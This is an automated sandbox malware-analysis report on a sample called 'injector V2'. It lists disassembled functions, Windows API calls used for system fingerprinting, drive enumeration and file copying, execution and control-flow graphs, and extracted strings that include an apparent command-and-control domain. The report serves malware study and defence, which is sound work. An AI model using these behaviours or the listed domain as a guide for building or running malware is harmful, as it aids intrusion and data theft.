                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AdjustPointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1740715915-0
                                                                                                                            • Opcode ID: c3883cfc76eef90477dc86f80c3d5233577d1adf882329254f29412588d35ced
                                                                                                                            • Instruction ID: 011f415e91e5e5b69ac81c9ec62745c7eed27363568d33de7b20805fe90502ee
                                                                                                                            • Opcode Fuzzy Hash: c3883cfc76eef90477dc86f80c3d5233577d1adf882329254f29412588d35ced
                                                                                                                            • Instruction Fuzzy Hash: 3E511372A022029FDB2A8F14E891B7AB7E4FF16312F1444EDED05972A1E731ED49D790
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00B5010E: WideCharToMultiByte.KERNEL32(?,00000000,00B33046,00000000,00000000,00000000,000000FF,?,?,00000000,00B33046,?,00B4C071,?,00000000,?), ref: 00B5016F
                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,00B4F8B4,?,?,?,00000000), ref: 00B4F572
                                                                                                                            • __dosmaperr.LIBCMT ref: 00B4F579
                                                                                                                            • GetLastError.KERNEL32(00000000,00B4F8B4,?,?,00000000,?,?,?,00000000,00000000,?,00B4F8B4,?,?,?,00000000), ref: 00B4F5B3
                                                                                                                            • __dosmaperr.LIBCMT ref: 00B4F5BA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1913693674-0
                                                                                                                            • Opcode ID: 0ce96eb5ecaf084e1ed619947cbce0cc5f82e3837bb8527f9f94e519a23b3e7f
                                                                                                                            • Instruction ID: 76521a857f5b0832f7d109ff8ab0f8d3037f6269f7ac3451eb492d8c058b6502
                                                                                                                            • Opcode Fuzzy Hash: 0ce96eb5ecaf084e1ed619947cbce0cc5f82e3837bb8527f9f94e519a23b3e7f
                                                                                                                            • Instruction Fuzzy Hash: 2321A771600617AFDB10AF658C8197BB7E9FF2436471085B9F86997250DB30EF40ABA1
                                                                                                                            APIs
                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00B50212
                                                                                                                              • Part of subcall function 00B5010E: WideCharToMultiByte.KERNEL32(?,00000000,00B33046,00000000,00000000,00000000,000000FF,?,?,00000000,00B33046,?,00B4C071,?,00000000,?), ref: 00B5016F
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B5024A
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B5026A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 158306478-0
                                                                                                                            • Opcode ID: 507738891ba6b25e576b98afd431d28e03af80b38d1db0edf54f0c0c9ee410a6
                                                                                                                            • Instruction ID: 12d92b183119b71e6ad47d4cc7f8598abb6e544062f5b1b315ee1bfb4c76b93a
                                                                                                                            • Opcode Fuzzy Hash: 507738891ba6b25e576b98afd431d28e03af80b38d1db0edf54f0c0c9ee410a6
                                                                                                                            • Instruction Fuzzy Hash: 0011E1A2511A167E671137729CCEE6F6EEDDE86396B1004E4FC02A2102EEB1CE059575
                                                                                                                            APIs
                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000), ref: 00B54417
                                                                                                                            • GetLastError.KERNEL32(?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000,?,?,?,00B512B7,00000000), ref: 00B54423
                                                                                                                              • Part of subcall function 00B54480: CloseHandle.KERNEL32(FFFFFFFE,00B54433,?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000,?,?), ref: 00B54490
                                                                                                                            • ___initconout.LIBCMT ref: 00B54433
                                                                                                                              • Part of subcall function 00B54455: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B543F1,00B53BCF,?,?,00B51971,?,00000000,00000000,?), ref: 00B54468
                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000,?), ref: 00B54448
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2744216297-0
                                                                                                                            • Opcode ID: 150d94e58e15aefaa22339708b0f3c6eb93d6b01ef7d051fb84f918a2386fa85
                                                                                                                            • Instruction ID: 43e1885cc9900822d50aae56e1f10bc73f010811f840e38796b0312f8d1d34ac
                                                                                                                            • Opcode Fuzzy Hash: 150d94e58e15aefaa22339708b0f3c6eb93d6b01ef7d051fb84f918a2386fa85
                                                                                                                            • Instruction Fuzzy Hash: 6AF09836540215BFCF221FD5AC09B993F6AEB087A6F054190FE1896230DF7288A0EB90
                                                                                                                            APIs
                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00B52265
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___except_validate_context_record
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 3493665558-3733052814
                                                                                                                            • Opcode ID: d5c06981bfc36291de2505b97a9cda873a24bd7453249828bd61b9ba05bc7eb6
                                                                                                                            • Instruction ID: 40a31173d2aec64bc69540581e6911f60949990bdecf3b5e977b2c018a296dfd
                                                                                                                            • Opcode Fuzzy Hash: d5c06981bfc36291de2505b97a9cda873a24bd7453249828bd61b9ba05bc7eb6
                                                                                                                            • Instruction Fuzzy Hash: 2231CF36502205DFCF228F50CC40B6E7BA5FF0A316F1841DAFC584A121C336C9AADB85

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:5.1%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:33.5%
                                                                                                                            Total number of Nodes:206
                                                                                                                            Total number of Limit Nodes:4
                                                                                                                            execution_graph 21486 40cf44 CoInitializeSecurity 21675 418960 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 21721 40d365 CoUninitialize 21723 40c369 RtlAllocateHeap RtlFreeHeap 21655 b50c59 LoadLibraryExW 21656 b51080 42 API calls 21724 b4ab8b EnterCriticalSection ___scrt_is_nonwritable_in_current_image __CreateFrameInfo 21725 b51ff6 27 API calls 21701 b4a6f0 DeleteCriticalSection TlsFree ___scrt_uninitialize_crt 21703 b48efb 7 API calls 2 library calls 21510 40db17 21511 40db30 21510->21511 21513 40db7e 21511->21513 21572 43e730 LdrInitializeThunk 21511->21572 21515 40dc0e 21513->21515 21573 43e730 LdrInitializeThunk 21513->21573 21528 4251e0 21515->21528 21517 40dc50 21536 425d40 21517->21536 21519 40dc8e 21546 4280d0 21519->21546 21523 40dcbc 21568 42afe0 21523->21568 21525 40dcc5 21526 434b70 6 API calls 21525->21526 21527 40dd06 21526->21527 21531 425240 21528->21531 21529 425327 21529->21517 21530 4255a1 GetLogicalDrives 21534 441000 LdrInitializeThunk 21530->21534 21531->21529 21531->21531 21533 425421 21531->21533 21574 441000 21531->21574 21533->21530 21533->21533 21535 4255b7 21534->21535 21535->21535 21537 425d4e 21536->21537 21585 441610 21537->21585 21539 425c7f 21579 421230 21539->21579 21540 425e2f 21589 441a90 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 21540->21589 21542 425e4e 21544 425ae0 21544->21539 21544->21540 21545 425d22 21544->21545 21545->21519 21547 4280f0 21546->21547 21548 42812e 21547->21548 21615 43e730 LdrInitializeThunk 21547->21615 21550 43c380 RtlAllocateHeap 21548->21550 21552 40dcb3 21548->21552 21553 4281aa 21550->21553 21551 43c3f0 RtlFreeHeap 21551->21552 21556 428530 21552->21556 21555 42820e 21553->21555 21616 43e730 LdrInitializeThunk 21553->21616 21555->21551 21617 428550 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 21556->21617 21558 428544 21558->21523 21559 428539 21559->21558 21618 43a5d0 21559->21618 21561 4290c0 CopyFileW 21567 428e52 21561->21567 21562 4291b8 21562->21523 21563 4290a8 CopyFileW 21563->21561 21564 440e40 LdrInitializeThunk 21564->21567 21566 42909e 21566->21563 21567->21561 21567->21562 21567->21563 21567->21564 21567->21566 21567->21567 21627 4411b0 LdrInitializeThunk 21567->21627 21569 42b080 21568->21569 21570 440e40 LdrInitializeThunk 21569->21570 21571 42b1b2 21570->21571 21572->21513 21573->21515 21575 441020 21574->21575 21576 44115e 21575->21576 21578 43e730 LdrInitializeThunk 21575->21578 21576->21533 21578->21576 21580 421240 21579->21580 21580->21580 21581 421308 21580->21581 21582 441000 LdrInitializeThunk 21580->21582 21583 42132b 21580->21583 21581->21545 21582->21583 21583->21581 21590 4233b0 21583->21590 21586 441630 21585->21586 21587 44172f 21586->21587 21614 43e730 LdrInitializeThunk 21586->21614 21587->21544 21589->21542 21606 440e40 21590->21606 21592 423bfe 21592->21581 21593 4233f0 21593->21592 21594 43c380 RtlAllocateHeap 21593->21594 21596 42342e 21594->21596 21603 4234cb 21596->21603 21610 43e730 LdrInitializeThunk 21596->21610 21597 43c3f0 RtlFreeHeap 21602 423b68 21597->21602 21598 43c380 RtlAllocateHeap 21598->21603 21599 423b4d 21599->21597 21601 423c63 21599->21601 21602->21592 21612 43e730 LdrInitializeThunk 21602->21612 21603->21598 21603->21599 21605 43c3f0 RtlFreeHeap 21603->21605 21611 43e730 LdrInitializeThunk 21603->21611 21605->21603 21607 440e50 21606->21607 21607->21607 21608 440fae 21607->21608 21613 43e730 LdrInitializeThunk 21607->21613 21608->21593 21610->21596 21611->21603 21612->21602 21613->21608 21614->21587 21615->21548 21616->21555 21617->21559 21619 441610 LdrInitializeThunk 21618->21619 21620 43a5ec 21619->21620 21623 43a6ce 21620->21623 21628 441a90 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 21620->21628 21622 43a616 21625 43a658 21622->21625 21629 442140 21622->21629 21623->21567 21625->21623 21639 43e730 LdrInitializeThunk 21625->21639 21627->21567 21628->21622 21630 442151 21629->21630 21631 44221e 21630->21631 21640 43e730 LdrInitializeThunk 21630->21640 21632 442488 21631->21632 21634 43c380 RtlAllocateHeap 21631->21634 21632->21625 21635 4422dd 21634->21635 21638 4423bf 21635->21638 21641 43e730 LdrInitializeThunk 21635->21641 21636 43c3f0 RtlFreeHeap 21636->21632 21638->21636 21639->21623 21640->21631 21641->21638 21658 b46cd0 19 API calls _ValidateLocalCookies 21680 b4d1d0 15 API calls 21682 b4c5d0 FreeLibrary 21727 b4e3d0 66 API calls 2 library calls 21728 b497d0 30 API calls _unexpected 21487 40dd2b 21488 40dd31 21487->21488 21489 40dd3b CoUninitialize 21488->21489 21490 40dd70 21489->21490 21683 b301dc 58 API calls _ValidateLocalCookies 21705 b492c0 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 21684 b4a9c2 11 API calls 21659 b54831 21 API calls __startOneArgErrorHandling 21708 b48e30 14 API calls ___std_exception_destroy 21732 b4cb31 16 API calls __dosmaperr 21685 b49132 124 API calls 4 library calls 21686 b49120 31 API calls 21735 b54721 20 API calls 21662 b4d822 LeaveCriticalSection __CreateFrameInfo 21663 b50c22 LoadLibraryExW GetLastError LoadLibraryExW 21664 b4f42b 11 API calls __strnicoll 21665 b4a810 GetCommandLineA GetCommandLineW 21687 b44110 6 API calls Concurrency::cancel_current_task 21736 b4cb10 GetProcessHeap 21667 b4e800 33 API calls 2 library calls 21737 b4e300 15 API calls 2 library calls 21688 b3510b 30 API calls 21690 40cd80 GetPixel 21460 40cf82 21461 40cf90 21460->21461 21464 439b70 21461->21464 21463 40cfbb 21466 439bd0 CoCreateInstance 21464->21466 21467 439c66 SysAllocString 21466->21467 21468 43a1ac 21466->21468 21471 439d36 21467->21471 21469 43a1bc GetVolumeInformationW 21468->21469 21484 43a1d3 21469->21484 21472 439d45 CoSetProxyBlanket 21471->21472 21473 43a198 SysFreeString 21471->21473 21474 439d65 SysAllocString 21472->21474 21475 43a18e 21472->21475 21473->21468 21477 439e30 21474->21477 21475->21473 21477->21477 21478 439e52 SysAllocString 21477->21478 21480 439e75 21478->21480 21479 43a178 SysFreeString SysFreeString 21479->21475 21480->21479 21481 43a16e 21480->21481 21482 439eb9 VariantInit 21480->21482 21481->21479 21485 439f10 21482->21485 21483 43a15d VariantClear 21483->21481 21484->21463 21485->21483 21691 b4d170 35 API calls 2 library calls 21712 b51e13 28 API calls 4 library calls 21491 43c490 21492 43c4c0 21491->21492 21493 43c50e 21492->21493 21501 43e730 LdrInitializeThunk 21492->21501 21498 43c6e1 21493->21498 21502 43c380 21493->21502 21496 43c5bc 21500 43c62e 21496->21500 21505 43e730 LdrInitializeThunk 21496->21505 21506 43c3f0 21500->21506 21501->21493 21503 43c3a0 21502->21503 21503->21503 21504 43c3cb RtlAllocateHeap 21503->21504 21504->21496 21505->21500 21507 43c487 21506->21507 21508 43c408 RtlFreeHeap 21506->21508 21507->21498 21508->21507 21740 b4ab67 25 API calls _unexpected 21669 b49060 53 API calls __RTC_Initialize 21714 b4ca60 7 API calls 21741 b54b60 15 API calls 21642 40d798 21644 40d810 21642->21644 21643 40d85e 21644->21643 21646 43e730 LdrInitializeThunk 21644->21646 21646->21643 21715 b4926d GetModuleHandleW __CreateFrameInfo 21446 408fa0 21447 408faf 21446->21447 21448 4091c2 ExitProcess 21447->21448 21449 408fb7 SHGetSpecialFolderPathW 21447->21449 21450 408fcd 21449->21450 21451 408fd5 GetCurrentThreadId GetCurrentProcessId 21450->21451 21452 4091bd 21450->21452 21454 409001 GetForegroundWindow 21451->21454 21455 408ffd 21451->21455 21459 43e680 FreeLibrary 21452->21459 21456 409166 21454->21456 21455->21454 21456->21452 21458 40bc10 FreeLibrary FreeLibrary 21456->21458 21458->21452 21459->21448 21693 b4bd57 11 API calls CallUnexpected 21694 b44150 31 API calls 21743 b54b50 IsProcessorFeaturePresent 21671 b21058 5 API calls _ValidateLocalCookies 21672 40d8af LdrInitializeThunk 21696 b4c540 RtlUnwind 21744 40a7be RtlFreeHeap

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 439b70-439bc6 1 439bd0-439bf0 0->1 1->1 2 439bf2-439c0b 1->2 4 439c15-439c60 CoCreateInstance 2->4 5 439c0d 2->5 6 439c66-439c9b 4->6 7 43a1ac-43a1d1 call 4403c0 GetVolumeInformationW 4->7 5->4 9 439ca0-439d06 6->9 12 43a1d3-43a1d7 7->12 13 43a1db-43a20f call 420090 7->13 9->9 11 439d08-439d3f SysAllocString 9->11 16 439d45-439d5f CoSetProxyBlanket 11->16 17 43a198-43a1a8 SysFreeString 11->17 12->13 21 43a210-43a218 13->21 19 439d65-439d86 16->19 20 43a18e-43a194 16->20 17->7 22 439d90-439dad 19->22 20->17 21->21 23 43a21a-43a21c 21->23 22->22 26 439daf-439e2b SysAllocString 22->26 24 43a22e-43a26d call 420090 23->24 25 43a21e-43a22b call 408850 23->25 33 43a270-43a278 24->33 25->24 29 439e30-439e50 26->29 29->29 32 439e52-439e77 SysAllocString 29->32 38 43a178-43a18a SysFreeString * 2 32->38 39 439e7d-439e9f 32->39 33->33 34 43a27a-43a27c 33->34 36 43a28e-43a2cd call 420090 34->36 37 43a27e-43a28b call 408850 34->37 47 43a2d0-43a2d8 36->47 37->36 38->20 45 439ea5-439ea8 39->45 46 43a16e-43a174 39->46 45->46 48 439eae-439eb3 45->48 46->38 47->47 49 43a2da-43a2dc 47->49 48->46 52 439eb9-439f0f VariantInit 48->52 50 43a2ee-43a32f call 420090 49->50 51 43a2de-43a2eb call 408850 49->51 59 43a330-43a338 50->59 51->50 53 439f10-439f40 52->53 53->53 56 439f42-439f57 53->56 60 439f5b-439f61 56->60 59->59 61 43a33a-43a33c 59->61 62 439f67-439f70 60->62 63 43a15d-43a16a VariantClear 60->63 64 43a34e-43a355 61->64 65 43a33e-43a34b call 408850 61->65 62->63 66 439f76-439f83 62->66 63->46 65->64 68 439fc5 66->68 69 439f85-439f8a 66->69 72 439fc7-439fe0 call 4086c0 68->72 71 439f9c-439fa0 69->71 74 439fa2-439fab 71->74 75 439f90 71->75 80 439fe6-439fef 72->80 81 43a104-43a115 72->81 78 439fb2-439fb6 74->78 79 439fad-439fb0 74->79 77 439f91-439f9a 75->77 77->71 77->72 78->77 82 439fb8-439fc3 78->82 79->77 80->81 83 439ff5-439fff 80->83 84 43a117 81->84 85 43a11c-43a132 81->85 82->77 86 43a000-43a00a 83->86 84->85 87 43a134 85->87 88 43a139-43a15a call 4086f0 call 4086d0 85->88 89 43a020-43a026 86->89 90 43a00c-43a011 86->90 87->88 88->63 93 43a044-43a050 89->93 94 43a028-43a02b 89->94 92 43a0b0-43a0b6 90->92 100 43a0b8-43a0be 92->100 97 43a052-43a055 93->97 98 43a0ca-43a0d2 93->98 94->93 96 43a02d-43a042 94->96 96->92 97->98 103 43a057-43a0a2 97->103 101 43a0d4-43a0d6 98->101 102 43a0d8-43a0db 98->102 100->81 105 43a0c0-43a0c2 100->105 101->100 106 43a100-43a102 102->106 107 43a0dd-43a0fe 102->107 103->92 105->86 108 43a0c8 105->108 106->92 107->92 108->81
                                                                                                                            APIs
                                                                                                                            • CoCreateInstance.OLE32(00444678,00000000,00000001,00444668,00000000), ref: 00439C58
                                                                                                                            • SysAllocString.OLEAUT32(13451142), ref: 00439D0D
                                                                                                                            • CoSetProxyBlanket.COMBASE(00007D7C,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00439D57
                                                                                                                            • SysAllocString.OLEAUT32(19C51BC5), ref: 00439DB4
                                                                                                                            • SysAllocString.OLEAUT32(19C51BC5), ref: 00439E53
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00439EC1
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0043A15E
                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 0043A182
                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 0043A188
                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 0043A19C
                                                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,99479BB7,00000000,00000000,00000000,00000000), ref: 0043A1CD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                            • String ID: =e3g$C$\$57
                                                                                                                            • API String ID: 2573436264-28043463
                                                                                                                            • Opcode ID: 10b567a2692ca6e1ed1829fea8fbbac440700af513a7ae008837dccd8f80b3cf
                                                                                                                            • Instruction ID: b12a140fe6d6408d223cd47253e56faaa9f3f1c3f18fc9839fc14b7d6c2cf08d
                                                                                                                            • Opcode Fuzzy Hash: 10b567a2692ca6e1ed1829fea8fbbac440700af513a7ae008837dccd8f80b3cf
                                                                                                                            • Instruction Fuzzy Hash: 85223F72A483119BD7248F24CC4176BBBE5EF89714F148A2EF8959B2C0D778D905CB8A

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 255 408fa0-408fb1 call 43d880 258 4091c2-4091c4 ExitProcess 255->258 259 408fb7-408fcf SHGetSpecialFolderPathW call 436e70 255->259 262 408fd5-408ffb GetCurrentThreadId GetCurrentProcessId 259->262 263 4091bd call 43e680 259->263 265 409001-409164 GetForegroundWindow 262->265 266 408ffd-408fff 262->266 263->258 267 409166-40918f 265->267 268 409199-4091b1 call 40a210 265->268 266->265 269 409191-409193 267->269 270 409195-409197 267->270 268->263 273 4091b3 call 40cda0 268->273 269->270 270->268 275 4091b8 call 40bc10 273->275 275->263
                                                                                                                            APIs
                                                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408FC2
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00408FD5
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00408FDD
                                                                                                                            • GetForegroundWindow.USER32 ref: 0040915C
                                                                                                                            • ExitProcess.KERNEL32 ref: 004091C4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4063528623-0
                                                                                                                            • Opcode ID: a705982eba4f8f2d09f5b437bbf37de4480f7a918adec5843908818670225285
                                                                                                                            • Instruction ID: df307e844b70b0a1f4aecca787a5c544b5e38e704fd3e829504f4c39917f94b4
                                                                                                                            • Opcode Fuzzy Hash: a705982eba4f8f2d09f5b437bbf37de4480f7a918adec5843908818670225285
                                                                                                                            • Instruction Fuzzy Hash: A3510973B043155BC70CAFA8CC9636AF6D6ABC8714F0E853EA894DB3D1EA789C044795

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 277 40cf82-40cf8e 278 40cf90-40cfa2 277->278 278->278 279 40cfa4-40cfb6 call 408e60 call 439b70 278->279 283 40cfbb-40cfe3 279->283 284 40cff0-40d012 283->284 284->284 285 40d014-40d062 284->285 286 40d070-40d0e0 285->286 286->286 287 40d0e2-40d0ea 286->287 288 40d0fb-40d10f 287->288 289 40d0ec-40d0ed 287->289 291 40d111-40d112 288->291 292 40d12b-40d133 288->292 290 40d0f0-40d0f9 289->290 290->288 290->290 293 40d120-40d129 291->293 294 40d135-40d136 292->294 295 40d14b-40d159 292->295 293->292 293->293 296 40d140-40d149 294->296 297 40d16b-40d239 295->297 298 40d15b-40d15f 295->298 296->295 296->296 300 40d240-40d291 297->300 299 40d160-40d169 298->299 299->297 299->299 300->300 301 40d293-40d2b3 300->301 302 40d2c0-40d302 301->302 302->302 303 40d304-40d33e call 40bc40 302->303
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: F5DEADD4C3E4B5B74AFF5ADEC9E6BD77$GVWv$librari-night.sbs$QW$U7[
                                                                                                                            • API String ID: 0-3659758271
                                                                                                                            • Opcode ID: d664edfcc0ef7abe299e126a1104d6d1c8b4b938cd66759c5ecb9563350e4580
                                                                                                                            • Instruction ID: 1f372396b4670dcfa468398e87f10cb4c486c55112f5b6038a055d3571dd4266
                                                                                                                            • Opcode Fuzzy Hash: d664edfcc0ef7abe299e126a1104d6d1c8b4b938cd66759c5ecb9563350e4580
                                                                                                                            • Instruction Fuzzy Hash: CDA107B56007818FD315CF29C891B62BBE1EF66310F2A85ADD0D68F7A2D738D806CB54

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
